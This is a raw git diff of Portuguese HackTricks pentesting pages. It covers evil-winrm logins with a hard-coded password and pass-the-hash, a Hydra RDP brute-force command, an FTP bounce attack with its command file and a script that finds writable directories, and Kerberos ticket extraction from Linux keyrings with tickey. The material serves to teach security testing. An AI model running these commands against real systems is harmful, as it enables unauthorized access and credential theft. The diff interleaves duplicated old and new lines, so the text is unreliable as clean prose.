O evil-winrm também oferece outras opções, como a capacidade de especificar um domínio, usar autenticação NTLM e até mesmo carregar um arquivo de script para execução remota. Consulte a documentação do evil-winrm para obter mais informações sobre esses recursos adicionais.
É importante ressaltar que o uso do evil-winrm em sistemas sem autorização prévia é ilegal e pode resultar em consequências legais graves. Portanto, sempre obtenha permissão por escrito antes de realizar qualquer teste de penetração.
```ruby
gem install evil-winrm
```
@ -254,47 +184,30 @@ Leia a **documentação** em seu github: [https://github.com/Hackplayers/evil-wi
```ruby
evil-winrm -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.' -i <IP>/<Domain>
```
Para usar o evil-winrm para se conectar a um **endereço IPv6**, crie uma entrada dentro do arquivo _**/etc/hosts**_ definindo um **nome de domínio** para o endereço IPv6 e conecte-se a esse domínio.
Para usar o evil-winrm para se conectar a um **endereço IPv6**, crie uma entrada dentro de _**/etc/hosts**_ configurando um **nome de domínio** para o endereço IPv6 e conecte-se a esse domínio.
### Passando o hash com o evil-winrm
### Passando o hash com evil-winrm
```ruby
evil-winrm -u <username> -H <Hash> -i <IP>
```
![](<../.gitbook/assets/image (173).png>)
### Usando uma máquina PS-docker
O uso de uma máquina PS-docker é uma técnica útil para realizar testes de penetração em serviços de rede. Essa abordagem permite executar comandos PowerShell em um contêiner Docker, o que pode ser útil para explorar vulnerabilidades e realizar atividades de hacking.
Para começar, certifique-se de ter o Docker instalado em sua máquina. Em seguida, você pode criar uma máquina PS-docker usando o seguinte comando:
```
docker run -it --name ps-docker mcr.microsoft.com/powershell
```
Isso criará um contêiner Docker com o PowerShell instalado. Agora você pode interagir com o contêiner usando o seguinte comando:
```
docker exec -it ps-docker pwsh
```
Isso abrirá uma sessão interativa do PowerShell dentro do contêiner. A partir daqui, você pode executar comandos PowerShell para realizar várias atividades de teste de penetração em serviços de rede.
Lembre-se de que o uso de uma máquina PS-docker deve ser feito com responsabilidade e apenas para fins legais, como testes de segurança autorizados.
![](<../.gitbook/assets/image (173).png>)
```
docker run -it quickbreach/powershell-ntlm
$creds = Get-Credential
Enter-PSSession -ComputerName 10.10.10.149 -Authentication Negotiate -Credential $creds
```
### Usando um script em ruby
### Usando um script ruby
Código extraído daqui: [https://alamot.github.io/winrm\_shell/](https://alamot.github.io/winrm\_shell/)
**Código extraído daqui: [https://alamot.github.io/winrm\_shell/](https://alamot.github.io/winrm\_shell/)**
```ruby
require 'winrm-fs'
# Author: Alamot
# To upload a file type: UPLOAD local_path remote_path
# e.g.: PS> UPLOAD myfile.txt C:\temp\myfile.txt
# https://alamot.github.io/winrm_shell/
conn = WinRM::Connection.new(
@ -386,31 +299,33 @@ Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} rdp://{IP}
```
<figure><img src="../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
**HackenProof é o lar de todas as recompensas por bugs de criptografia.**
<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
**Seja recompensado sem atrasos**\
As recompensas do HackenProof são lançadas apenas quando seus clientes depositam o orçamento de recompensa. Você receberá a recompensa após a verificação do bug.
Junte-se ao servidor [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) para se comunicar com hackers experientes e caçadores de bugs!
**Adquira experiência em pentesting web3**\
Protocolos de blockchain e contratos inteligentes são a nova Internet! Domine a segurança web3 em seus dias de ascensão.
**Percepções de Hacking**\
Envolver-se com conteúdo que explora a emoção e os desafios do hacking
**Torne-se uma lenda hacker web3**\
Ganhe pontos de reputação com cada bug verificado e conquiste o topo do leaderboard semanal.
**Notícias de Hacking em Tempo Real**\
Mantenha-se atualizado com o mundo acelerado do hacking através de notícias e percepções em tempo real
[**Cadastre-se no HackenProof**](https://hackenproof.com/register) e comece a ganhar com seus hacks!
**Últimos Anúncios**\
Fique informado sobre os mais novos programas de recompensas por bugs lançados e atualizações cruciais na plataforma
{% embed url="https://hackenproof.com/register" %}
**Junte-se a nós no** [**Discord**](https://discord.com/invite/N3FrSbmwdy) e comece a colaborar com os melhores hackers hoje!
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking na AWS de zero a herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? Ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
Outras maneiras de apoiar o HackTricks:
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os repositórios** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

171
network-services-pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md
View file

@ -1,169 +1,52 @@
```markdown
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Participe do grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou do grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
# Resumo
Se você tem acesso a um servidor FTP bounce, você pode fazê-lo solicitar arquivos de outro servidor FTP \(onde você conhece algumas credenciais\) e baixar esse arquivo para o seu próprio servidor.
Se você tiver acesso a um servidor FTP de rebote, você pode fazer com que ele solicite arquivos de outro servidor FTP \(onde você conhece algumas credenciais\) e baixe esse arquivo para seu próprio servidor.
## Requisitos
Credenciais válidas de FTP no servidor FTP Intermediário
Credenciais válidas de FTP no servidor FTP Vítima
Ambos os servidores aceitam o comando PORT \(ataque FTP bounce\)
Você pode escrever dentro de algum diretório do servidor FTP Intermediário
O servidor intermediário terá mais acesso dentro do servidor FTP Vítima do que você por algum motivo \(é isso que você vai explorar\)
- Credenciais válidas de FTP no servidor FTP intermediário
- Credenciais válidas de FTP no servidor FTP vítima
- Ambos os servidores aceitam o comando PORT \(ataque de rebote FTP\)
- Você pode escrever dentro de algum diretório do servidor FTP intermediário
- O servidor intermediário terá mais acesso dentro do Servidor FTP Vítima do que você por algum motivo \(isso é o que você vai explorar\)
## Passos
## Etapas
1. Conecte-se ao seu próprio servidor FTP e torne a conexão passiva \(comando pasv\) para fazê-lo escutar em um diretório onde o serviço da vítima enviará o arquivo
2. Crie o arquivo que será enviado do servidor FTP Intermediário para o servidor Vítima \(o exploit\). Este arquivo será um texto simples dos comandos necessários para autenticar contra o servidor Vítima, mudar o diretório e baixar um arquivo para o seu próprio servidor.
3. Conecte-se ao servidor FTP Intermediário e faça o upload do arquivo anterior
4. Faça o servidor FTP Intermediário estabelecer uma conexão com o servidor vítima e enviar o arquivo de exploit
5. Capture o arquivo no seu próprio servidor FTP
6. Delete o arquivo de exploit do servidor FTP Intermediário
1. Conecte-se ao seu próprio servidor FTP e faça a conexão passiva \(comando pasv\) para fazê-lo ouvir em um diretório onde o serviço vítima enviará o arquivo
2. Faça o arquivo que será enviado do servidor FTP intermediário para o servidor Vítima \(o exploit\). Este arquivo será um texto simples dos comandos necessários para autenticar-se contra o servidor Vítima, alterar o diretório e baixar um arquivo para seu próprio servidor.
3. Conecte-se ao Servidor FTP Intermediário e faça o upload do arquivo anterior
4. Faça o servidor FTP intermediário estabelecer uma conexão com o servidor vítima e enviar o arquivo de exploit
5. Capture o arquivo em seu próprio servidor FTP
6. Exclua o arquivo de exploit do servidor FTP intermediário
Para obter informações mais detalhadas, consulte o post: [http://www.ouah.org/ftpbounce.html](http://www.ouah.org/ftpbounce.html)
Todas as informações neste post foram extraídas de: [http://www.ouah.org/ftpbounce.html](http://www.ouah.org/ftpbounce.html)
# O Ataque FTP Bounce
Este texto discute um dos muitos possíveis usos do "ataque de bounce do servidor FTP". O mecanismo utilizado é provavelmente bem conhecido, mas até o momento o interesse em detalhar ou corrigi-lo parece baixo ou inexistente. Este exemplo em particular demonstra mais uma maneira pela qual a maioria das "restrições de exportação" eletronicamente aplicadas são completamente inúteis e triviais de contornar. Foi escolhido na tentativa de fazer o leitor perceber que existem alguns aspectos realmente mal concebidos do protocolo FTP padrão.
Agradecimentos também a Alain Knaff em imag.fr por uma discussão breve, mas interessante, sobre alguns desses problemas há alguns meses, o que me fez pensar mais profundamente sobre eles.
## O motivo
Você é um usuário em foreign.fr, com endereço IP F.F.F.F, e quer recuperar o código-fonte criptográfico de crypto.com nos EUA. O servidor FTP em crypto.com está configurado para permitir sua conexão, mas negar acesso aos fontes criptográficos porque seu endereço IP de origem é de um site fora dos EUA \[tanto quanto o servidor FTP pode determinar a partir do DNS, isto é\]. De qualquer forma, você não pode recuperar diretamente o que deseja do servidor de crypto.com.
No entanto, crypto.com permitirá que ufred.edu baixe fontes criptográficas porque ufred.edu também está nos EUA. Você sabe que /incoming em ufred.edu é um diretório mundialmente gravável onde qualquer usuário anônimo pode soltar arquivos e lê-los de volta. O endereço IP de crypto.com é C.C.C.C.
## O ataque
Isso pressupõe que você tenha um servidor FTP que faz modo passivo. Abra uma conexão FTP para o endereço IP real da sua própria máquina \[não localhost\] e faça login. Mude para um diretório conveniente onde você tenha acesso de escrita, e então faça:
```
```text
pasv
stor foobar
```
```markdown
Tome nota do endereço e da porta que são retornados do comando PASV, F,F,F,F,X,X. Esta sessão FTP agora ficará inativa, então minimize-a ou mude para outra janela ou algo assim para prosseguir com o resto.
Construa um arquivo contendo comandos do servidor FTP. Vamos chamar este arquivo de "`instrs`". Ele terá a seguinte aparência:
```
```text
user ftp
pass -anonymous@
cwd /export-restricted-crypto
type i
port F,F,F,F,X,X
retr crypto.tar.Z
quit
^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@
^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@
...
```
```
Abra uma conexão FTP com ufred.edu, faça login anonimamente e acesse /incoming. Agora digite o seguinte nesta sessão FTP, que transfere uma cópia do seu arquivo "`instrs`" e depois diz ao servidor FTP de ufred.edu para se conectar ao servidor FTP de crypto.com usando seu arquivo como os comandos:
```
```text
put instrs
port C,C,C,C,0,21
retr instrs
```
`Crypto.tar.Z` agora deve aparecer como "`foobar`" em sua máquina através da sua primeira conexão FTP. Se a conexão com ufred.edu não terminou por si mesma devido a um bug comum do servidor, limpe excluindo "`instrs`" e saindo. Caso contrário, você terá que se reconectar para terminar.
## Discussão
Existem várias variantes disso. Sua conexão ouvinte PASV pode ser aberta em qualquer máquina que você tenha acesso de escrita de arquivo -- a sua própria, outra conexão com ufred.edu ou em algum lugar completamente não relacionado. Na verdade, nem precisa ser um servidor FTP -- qualquer utilitário que escute em uma porta TCP conhecida e leia dados brutos para um arquivo servirá. Uma conexão de dados FTP em modo passivo é simplesmente uma maneira conveniente de fazer isso.
Os nulos extras no final do arquivo de comando são para preencher as janelas TCP em ambas as extremidades da conexão ufred -&gt; crypto e garantir que a conexão de comando permaneça aberta tempo suficiente para que toda a sessão seja executada. Caso contrário, a maioria dos servidores FTP tende a abortar todas as transferências e processamento de comandos quando a conexão de controle é encerrada prematuramente. O tamanho dos dados é suficiente para preencher as janelas de recebimento e transmissão, que em alguns sistemas operacionais são bastante grandes \[na ordem de 30K\]. Você pode reduzir isso se souber quais sistemas operacionais estão em cada extremidade e a soma dos tamanhos padrão de suas janelas TCP. Ele é dividido em linhas de 250 caracteres para evitar estouro de buffers de comando no servidor alvo -- provavelmente acadêmico, já que você já disse ao servidor para encerrar.
Se crypto.com proibir \*qualquer\* conexão de cliente FTP de você em foreign.fr e você precisar ver quais arquivos estão onde, você sempre pode colocar "`list -aR`" no seu arquivo de comando e obter uma listagem de diretório de toda a árvore via ufred.
Você pode ter que recuperar seu arquivo de comando para o servidor FTP do alvo em modo ASCII em vez de modo binário. Alguns servidores FTP podem lidar com novas linhas brutas, mas outros podem precisar de linhas de comando terminadas por pares CRLF. Tenha isso em mente ao recuperar arquivos para daemons que não sejam servidores FTP também.
## Outras possibilidades
Apesar do fato de que tais conexões de terceiros são apenas de mão única, elas podem ser usadas para todo tipo de coisa. Métodos semelhantes podem ser usados para postar e-mails e notícias praticamente não rastreáveis, atacar servidores em vários sites, encher discos, tentar pular firewalls e, geralmente, ser irritante e difícil de rastrear ao mesmo tempo. Um pouco de reflexão trará a realização de inúmeras outras possibilidades assustadoras.
Conexões lançadas dessa maneira vêm da porta de origem 20, que alguns sites permitem passar por seus firewalls em um esforço para lidar com o problema "ftp-data". Para alguns propósitos, isso pode ser a próxima melhor coisa a ataques com rota de origem, e é provável que tenha sucesso onde o roteamento de origem falha contra filtros de pacotes. E tudo isso é possível pela forma como a especificação do protocolo FTP foi escrita, permitindo que conexões de controle venham de qualquer lugar e conexões de dados vão para qualquer lugar.
## Defesas
Sempre haverá sites na rede com servidores FTP antigos e diretórios graváveis que permitem esse tipo de tráfego, então dizer "consertar todos os servidores FTP" é a resposta errada. Mas você pode proteger o seu próprio contra ser um ponto de salto de terceiros e ter outro usado contra você.
A primeira coisa óbvia a fazer é permitir que um servidor FTP faça conexões de dados apenas para o mesmo host de onde a conexão de controle se originou. Isso não impede o ataque acima, é claro, já que o ouvinte PASV poderia estar facilmente em ufred.edu e, portanto, atender a esse requisito, mas impede que \*seu\* site seja um ponto de salto potencial. Isso também quebra o conceito de "proxy FTP", mas escondido em algum lugar neste parágrafo está um violino muito pequeno.
A próxima coisa óbvia é proibir conexões de controle FTP que venham de portas reservadas, ou pelo menos da porta 20. Isso impede o cenário acima como declarado.
Ambas as coisas, além do usual sobre bloquear pacotes com rota de origem e outras vias de falsificação, são necessárias para prevenir hacks desse tipo. E pense se você realmente precisa de um diretório "incoming" aberto.
Permitir apenas conexões de dados de cliente em modo passivo é outra possibilidade, mas ainda existem muitos clientes FTP em uso que não são conscientes do modo passivo.
## "Um consenso frouxo e código em execução"
Há algum trabalho existente abordando isso disponível aqui em avian.org \[e está há vários meses, devo acrescentar\] no "[arquivo fixkits](ftp://ftp.avian.org:/src/fixkits/)". Várias modificações para wu-ftpd-2.4 são apresentadas, que incluem código para prevenir e registrar tentativas de usar comandos PORT falsos. Correções de segurança recentes de outros lugares também estão incluídas, juntamente com suporte s/key e várias opções de compilação para reforçar a segurança para aplicações específicas.
Stan Barber em academ.com está trabalhando na fusão dessas e várias outras correções em um verdadeiro lançamento atualizado do wu-ftpd. Há um par de outros esforços divergentes em andamento. Em nenhum lugar é afirmado que qualquer um desses trabalhos esteja completo ainda, mas é um começo em direção a algo que tenho em mente há um tempo -- um lançamento em toda a rede do wu-ftpd-2.5, com contribuições de toda a rede. O servidor wu-ftpd se tornou muito popular, mas precisa urgentemente de mais uma atualização de segurança. Seria bom reunir todas as melhorias em um lugar coordenado, e parece que isso vai acontecer. Tudo isso ainda não ajudará pessoas que insistem em executar servidores fornecidos por fornecedores, é claro.
Verificar a sanidade da porta de origem da conexão do cliente não é implementada especificamente nas correções do servidor FTP, mas em modificações no pacote tcp-wrappers de Wietse, já que esse problema é mais geral. Uma simples opção PORT é adicionada que nega conexões de faixas configuráveis de portas de origem no estágio tcpd, antes de um daemon chamado ser executado.
Algumas dessas coisas são apontadas por [/src/fixkits/README](ftp://ftp.avian.org:/src/fixkits/README) na área de FTP anônimo aqui. Leia este roteiro antes de pegar outras coisas.
## Notas
Adicionar os nulos no final do arquivo de comando foi a chave para fazer isso funcionar contra uma variedade de daemons. Simplesmente enviar os dados desejados geralmente falharia devido ao fechamento imediato sinalizando ao daemon para desistir.
Se a WUSTL não desistiu completamente do projeto wu-ftpd, eles estão mantendo muito silêncio sobre trabalhos futuros. Bryan O'Connor parece ter muitos outros projetos para atender agora...
Este é um script trivial para encontrar diretórios e arquivos de propriedade do ftp e graváveis pelo mundo em um servidor FTP anônimo baseado em unix. Você ficaria surpreso com quantos desses "pontos de salto" graváveis aparecem após uma curta execução de algo assim. Você terá que verificar mais tarde se pode tanto PUT quanto GET arquivos de tais lugares; alguns servidores protegem arquivos carregados contra leitura. Muitos não o fazem e depois se perguntam por que estão entre os dez principais sites de warez desta semana...
```text
#!/bin/sh
ftp -n $1 << FOE
quote "user ftp"
quote "pass -nobody@"
prompt
cd /
dir "-aR" xxx.$$
bye
FOE
# Not smart enough to figure out ftp's numeric UID if no passwd file!
cat -v xxx.$$ | awk '
BEGIN { idir = "/" ; dirp = 0 }
/.:$/ { idir = $0 ; dirp = 1 ; }
/^[-d][-r](......w.|........ *[0-9]* ftp *)/ {
if (dirp == 1) print idir
dirp = 0
print $0
} '
rm xxx.$$
```
Suponha que isto possa ser chamado de um white paper. Está disponível em avian.org em [/random/ftp-attack](ftp://ftp.avian.org:/random/ftp-attack) e também foi postado em vários lugares relevantes. \_H\* 950712
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>

56
network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md
View file

@ -1,52 +1,44 @@
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Obtenha o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
No Linux, **os tickets são armazenados em caches de credenciais ou ccaches**. Existem 3 tipos principais, que indicam onde **os tickets podem ser encontrados:**
### Armazenamento de Credenciais no Linux
Os sistemas Linux armazenam credenciais em três tipos de caches, a saber **Arquivos** (no diretório `/tmp`), **Keyrings do Kernel** (um segmento especial no kernel Linux) e **Memória do Processo** (para uso de um único processo). A variável **default\_ccache\_name** em `/etc/krb5.conf` revela o tipo de armazenamento em uso, com padrão para `FILE:/tmp/krb5cc_%{uid}` se não especificado.
* **Arquivos**, por padrão na pasta **/tmp**, no formato **krb5cc\_%{uid}.**
* **Keyrings do Kernel**, um espaço especial no kernel do Linux fornecido para armazenar chaves.
* **Memória do processo**, usado quando apenas um processo precisa usar os tickets.
### Extraindo Credenciais
O artigo de 2017, [**Roubo de Credenciais Kerberos (GNU/Linux)**](https://www.delaat.net/rp/2016-2017/p97/report.pdf), descreve métodos para extrair credenciais de keyrings e processos, enfatizando o mecanismo de keyring do kernel Linux para gerenciar e armazenar chaves.
Para verificar qual tipo de armazenamento é usado em uma máquina específica, a variável _**default\_ccache\_name**_ deve ser verificada no arquivo **/etc/krb5.conf**, que por padrão tem permissão de leitura para qualquer usuário. Caso este parâmetro esteja ausente, seu valor padrão é _FILE:/tmp/krb5cc\_%{uid}_.
#### Visão Geral da Extração de Keyring
A chamada de sistema **keyctl**, introduzida na versão do kernel 2.6.10, permite que aplicativos de espaço de usuário interajam com keyrings do kernel. As credenciais nos keyrings são armazenadas como componentes (principal padrão e credenciais), distintas dos ccaches de arquivo que também incluem um cabeçalho. O script **hercules.sh** do artigo demonstra a extração e reconstrução desses componentes em um arquivo ccache utilizável para roubo de credenciais.
Para extrair **tickets das outras 2 fontes** (keyrings e processos), um excelente artigo, [**Kerberos Credential Thievery (GNU/Linux)**](https://www.delaat.net/rp/2016-2017/p97/report.pdf), publicado em 2017, explica maneiras de recuperar os tickets deles.
#### Ferramenta de Extração de Tickets: Tickey
Baseando-se nos princípios do script **hercules.sh**, a ferramenta [**tickey**](https://github.com/TarlogicSecurity/tickey) é especificamente projetada para extrair tickets de keyrings, executada via `/tmp/tickey -i`.
### Keyring - Do artigo
# Referências
* [**https://www.tarlogic.com/en/blog/how-to-attack-kerberos/**](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/)
> O **kernel do Linux** possui um recurso chamado **keyrings**. Esta é uma **área de memória residindo** dentro do kernel que é usada para **gerenciar e reter chaves**.
>
> A chamada de sistema **keyctl** foi introduzida na versão do kernel 2.6.10 5 . Isso fornece **aplicações do espaço do usuário uma API** que pode ser usada para interagir com os keyrings do kernel.
> O **nome do keyring** em uso pode ser analisado a partir do **arquivo de configuração do Kerberos /etc/krb5.conf** que tem permissão de leitura habilitada para qualquer pessoa (octal 644) por padrão. Um atacante pode então aproveitar essa informação para **procurar por keyrings contendo tickets** e extrair os tickets. Um script de prova de conceito que implementa essa funcionalidade pode ser visto na Seção A.2 **(hercules.sh)**. Em um keyring, o ccache é armazenado como componentes. Como visto na Figura 2, um ccache de arquivo é composto por 3 componentes distintos: cabeçalho, principal padrão e uma sequência de credenciais. Um **keyring contém o principal padrão e as credenciais**. Este script irá despejar esses componentes em arquivos separados. Em seguida, usando um **cabeçalho sintetizado pelo atacante**, essas peças são combinadas na ordem correta para **reconstruir um ccache de arquivo**. Este arquivo reconstruído pode então ser exfiltrado para uma máquina do atacante e usado para se passar por um usuário do Kerberos. Um programa simples para gerar um cabeçalho de ccache válido pode ser visto na Seção A.3.
Baseado no **script heracles.sh** (do artigo), uma ferramenta em C que você pode usar (criada pelo autor do post completo) é [**tickey**](https://github.com/TarlogicSecurity/tickey)**, e ela extrai tickets de keyrings:**
```
/tmp/tickey -i
```
**Esta informação foi retirada de:** [**https://www.tarlogic.com/en/blog/how-to-attack-kerberos/**](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/)
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
